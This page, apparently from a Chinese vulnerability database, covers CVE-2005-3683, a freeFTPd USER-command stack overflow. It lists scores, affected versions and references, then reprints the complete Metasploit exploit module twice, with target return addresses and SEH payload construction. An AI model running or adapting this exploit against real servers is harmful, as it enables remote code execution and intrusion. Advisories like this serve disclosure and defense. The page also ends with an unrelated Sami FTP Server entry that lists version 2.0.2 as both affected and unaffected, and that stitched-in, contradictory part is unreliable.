CVE-2005-3683
CVSS7.5
发布时间 :2005-11-18 20:03:00
修订时间 :2016-10-17 23:36:52
NMCOEPS    

[原文]Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.


[CNNVD]FreeFTPD USER命令缓冲区溢出漏洞(CNNVD-200511-234)

        FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。
        由于没有正确的验证用户输入导致FreeFTPd中存在缓冲区溢出漏洞。成功利用这个漏洞的攻击者可以导致服务器崩溃,或以系统权限执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:freeftpd:freeftpd:1.0.2
cpe:/a:freeftpd:freeftpd:1.0.1
cpe:/a:freeftpd:freeftpd:1.0
cpe:/a:freeftpd:freeftpd:1.0.6
cpe:/a:freeftpd:freeftpd:1.0.5
cpe:/a:freeftpd:freeftpd:1.0.4
cpe:/a:freeftpd:freeftpd:1.0.3
cpe:/a:freeftpd:freeftpd:1.0.8
cpe:/a:freeftpd:freeftpd:1.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3683
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-234
(官方数据源) CNNVD

- 其它链接及资源

http://freeftpd.com/?ctt=changelog
(UNKNOWN)  CONFIRM  http://freeftpd.com/?ctt=changelog
http://marc.info/?l=full-disclosure&m=113213763821294&w=2
(UNKNOWN)  FULLDISC  20051116 freeftpd USER bufferoverflow
http://marc.info/?l=full-disclosure&m=113216611924774&w=2
(UNKNOWN)  FULLDISC  20051116 re: freeftpd USER bufferoverflow
http://securitytracker.com/id?1015230
(VENDOR_ADVISORY)  SECTRACK  1015230
http://www.securityfocus.com/bid/15457
(UNKNOWN)  BID  15457
http://www.vupen.com/english/advisories/2005/2458
(UNKNOWN)  VUPEN  ADV-2005-2458
http://xforce.iss.net/xforce/xfdb/23118
(UNKNOWN)  XF  freeftpd-multiple-command-bo(23118)

- 漏洞信息

FreeFTPD USER命令缓冲区溢出漏洞
高危 缓冲区溢出
2005-11-18 00:00:00 2005-11-22 00:00:00
远程  
        FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。
        由于没有正确的验证用户输入导致FreeFTPd中存在缓冲区溢出漏洞。成功利用这个漏洞的攻击者可以导致服务器崩溃,或以系统权限执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://freeftpd.com/

- 漏洞信息 (16707)

freeFTPd 1.0 Username Overflow (EDBID:16707)
windows remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: freeftpd_user.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'freeFTPd 1.0 Username Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the freeFTPd
				multi-protocol file transfer service. This flaw can only be
				exploited when logging has been enabled (non-default).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2005-3683'],
					[ 'OSVDB', '20909'],
					[ 'BID', '15457'],
					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows 2000 English ALL',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4,
						},
					],
					[
						'Windows XP Pro SP0/SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad,
						},
					],
					[
						'Windows NT SP5/SP6a English',
						{
							'Platform' => 'win',
							'Ret'      => 0x776a1799,
						},
					],
					[
						'Windows 2003 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x7ffc0638,
						},
					],
				],
			'DisclosureDate'  => 'Nov 16 2005'
		))
	end

	def check
		connect
		disconnect
		if (banner =~ /freeFTPd 1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1816, payload_badchars)
		seh          = generate_seh_payload(target.ret)
		buf[1008, seh.length] = seh

		send_cmd( ['USER', buf] , false)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83039)

freeFTPd 1.0 Username Overflow (PacketStormID:F83039)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,protocol
CVE-2005-3683
[点击下载]

This Metasploit module exploits a stack overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'freeFTPd 1.0 Username Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the freeFTPd
				multi-protocol file transfer service. This flaw can only be
				exploited when logging has been enabled (non-default).
					
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-3683'],
					[ 'OSVDB', '20909'],
					[ 'BID', '15457'],
					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Windows 2000 English ALL',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4,
						},
					],
					[ 
						'Windows XP Pro SP0/SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad,
						},
					],
					[ 
						'Windows NT SP5/SP6a English',
						{
							'Platform' => 'win',
							'Ret'      => 0x776a1799,
						},
					],
					[ 
						'Windows 2003 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x7ffc0638,
						},
					],																							
				]))
	end

	def check
		connect
		disconnect		
		if (banner =~ /freeFTPd 1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1816, payload_badchars)
		seh          = generate_seh_payload(target.ret) 
		buf[1008, seh.length] = seh

		send_cmd( ['USER', buf] , false)

		handler
		disconnect
	end

end
    

- 漏洞信息

20909
freeFTPd Multiple Command Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in freeFTPd. The 'USER', 'MKD' and 'DELE' commands fail to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long string to the commands, a remote attacker can cause the daemon to crash resulting in a loss of availability.

- 时间线

2005-11-16 Unknow
2005-11-16 Unknow

- 解决方案

Upgrade to version 1.0.9 or higher, as it has been reported to fix the USER command vulnerability. However, the upgrade does not fix the MKD and DELE commands vulnerabilities.

- 相关参考

- 漏洞作者

- 漏洞信息

Sami FTP Server User Command Buffer Overflow Vulnerability
Boundary Condition Error 16370
Yes No
2006-01-24 12:00:00 2008-02-19 06:25:00
Critical Security is credited with the discovery of this vulnerability.

- 受影响的程序版本

KarjaSoft Sami FTP Server 2.0.1
KarjaSoft Sami FTP Server 2.0.2

- 不受影响的程序版本

KarjaSoft Sami FTP Server 2.0.2

- 漏洞讨论

Sami FTP Server is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before storing it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected server application. This likely occurs with SYSTEM-level privileges.

Sami FTP Server 2.0.1 is affected by this issue; other versions may also be affected.

UPDATE (February 15, 2008): This issue was reported again in a message to Bugtraq. The message states that 2.0.* is vulnerable, implying that the fixed version may still be affected. However, this has not been confirmed.

- 漏洞利用

The following exploit is available:

- 解决方案

The vendor has released Sami FTP Server 2.0.2 to address this issue.


KarjaSoft Sami FTP Server 2.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站